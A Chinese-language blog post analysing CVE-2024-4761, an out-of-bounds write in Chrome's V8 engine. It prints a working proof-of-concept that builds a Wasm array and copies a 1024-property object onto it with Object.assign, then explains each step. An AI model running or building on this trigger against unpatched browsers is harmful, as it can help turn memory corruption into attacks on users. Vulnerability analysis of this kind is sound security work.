当前位置：首页 > news >正文

CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

news 2025/11/12 15:39:00

分析 CVE-2024-4761 和 POC 代码

CVE-2024-4761 描述

CVE-2024-4761 是一个在 V8 引擎中发现的越界写漏洞，报告日期为 2024-05-09。这个漏洞可能允许攻击者通过特制的代码执行任意代码或者造成内存破坏，进而导致程序崩溃或其他不安全行为。

POC 代码解析

const prefix = "...";d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);let builder = new WasmModuleBuilder();let array = builder.addArray(kWasmI32, true);builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])).addBody([kExprLocalGet, 0,kGCPrefix, kExprArrayNewDefault, array,kGCPrefix, kExprExternConvertAny,]).exportFunc();let instance = builder.instantiate({});
let wasm = instance.exports;let array42 = wasm.createArray(42);let src = {};
src.a = 1;
delete src.a;for (let i = 0; i < 1024; i++) {src[`p${i}`] = 1;
}Object.assign(array42, src);

在这里插入图片描述

代码分析

加载 wasm-module-builder.js 模块：
```
d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
```
这里假设 D8（V8 引擎的调试工具）正在执行一段 JavaScript 代码，该代码加载了 WebAssembly 模块构建器脚本。
构建 WebAssembly 模块：
```
let builder = new WasmModuleBuilder();
let array = builder.addArray(kWasmI32, true);
```
使用 WasmModuleBuilder 创建一个新的 WebAssembly 模块，并定义一个整数数组类型。
添加和导出一个函数：
```
builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])).addBody([kExprLocalGet, 0,kGCPrefix, kExprArrayNewDefault, array,kGCPrefix, kExprExternConvertAny,]).exportFunc();
```
这个函数 createArray 接受一个整数参数，创建一个新的 WebAssembly 数组并返回一个外部引用。函数体包含指令序列来获取局部变量，创建默认的数组，并将其转换为外部引用。
实例化模块并调用导出函数：
```
let instance = builder.instantiate({});
let wasm = instance.exports;
let array42 = wasm.createArray(42);
```
实例化模块后，调用 createArray 函数，创建一个包含 42 个元素的数组。

构建和修改对象：

let src = {};
src.a = 1;
delete src.a;
for (let i = 0; i < 1024; i++) {src[`p${i}`] = 1;
}
Object.assign(array42, src);

创建一个对象 src，并在其中动态添加属性。最后，使用 Object.assign 将 src 的属性赋值给 array42。

漏洞利用可能性

此代码通过 Object.assign 将一个具有大量属性的对象赋值给一个 WebAssembly 数组，这种操作在 V8 引擎内部可能导致内存管理或边界检查失效，进而触发越界写漏洞。具体表现可能包括覆盖数组边界以外的内存区域，从而执行任意代码或导致程序崩溃。

结论

从代码来看，这段 POC 似乎旨在触发 V8 引擎中的越界写漏洞。通过构建一个包含大量属性的对象并将其分配给 WebAssembly 数组，可以测试 V8 的内存边界检查是否有缺陷。如果存在缺陷，该操作可能会导致越界写，从而验证 CVE-2024-4761 漏洞的真实性。因此，POC 代码看起来是合理且可能真实的漏洞利用示例。

CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

分析 CVE-2024-4761 和 POC 代码

CVE-2024-4761 描述

POC 代码解析

代码分析

漏洞利用可能性

结论

相关文章：

CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

字符串函数（二）：strlen(求长度)，strstr(查找子串)，strtok(分割)，strerror(打印错误信息)

EUCR-30S电机保护器施耐德EOCR

人工神经网络（科普）

宇宙（科普）

安防视频/视频汇聚系统EasyCVR视频融合云平台助力智能化酒店安防体系的搭建

SpringCloudAlibaba:5.1Sentinel的基本使用

SHELL-双重循环习题练习

2024年为什么很多电商商家，都想涌入视频号，究竟是什么原因？

Google Gemma 2B 微调实战（IT科技新闻标题生成）

RabbitMQ：深入理解高性能消息队列

【北京迅为】《iTOP-3588开发板源码编译手册》-第4章 Android12/Linux设备树简介

C++ C# 贝塞尔曲线

勒索软件漏洞？在不支付赎金的情况下解密文件

实时“秒回”，像真人一样语音聊天，GPT-4o模型强到恐怖

Properties配置文件和源码

redis原生命令及项目使用

使用VSCode生成代码、查询数据表

使用 PXE+Kickstart 批量网络自动装机

微信小程序交互增强：实现上拉加载、下拉刷新与一键返回顶部【代码示例】

变量 varablie 声明- Rust 变量 let mut 声明与 C/C++ 变量声明对比分析

Python：操作 Excel 折叠

【入坑系列】TiDB 强制索引在不同库下不生效问题

解决Ubuntu22.04 VMware失败的问题 ubuntu入门之二十八

关于nvm与node.js

连锁超市冷库节能解决方案：如何实现超市降本增效

在四层代理中还原真实客户端ngx_stream_realip_module

1.3 VSCode安装与环境配置

苍穹外卖--缓存菜品

高危文件识别的常用算法：原理、应用与企业场景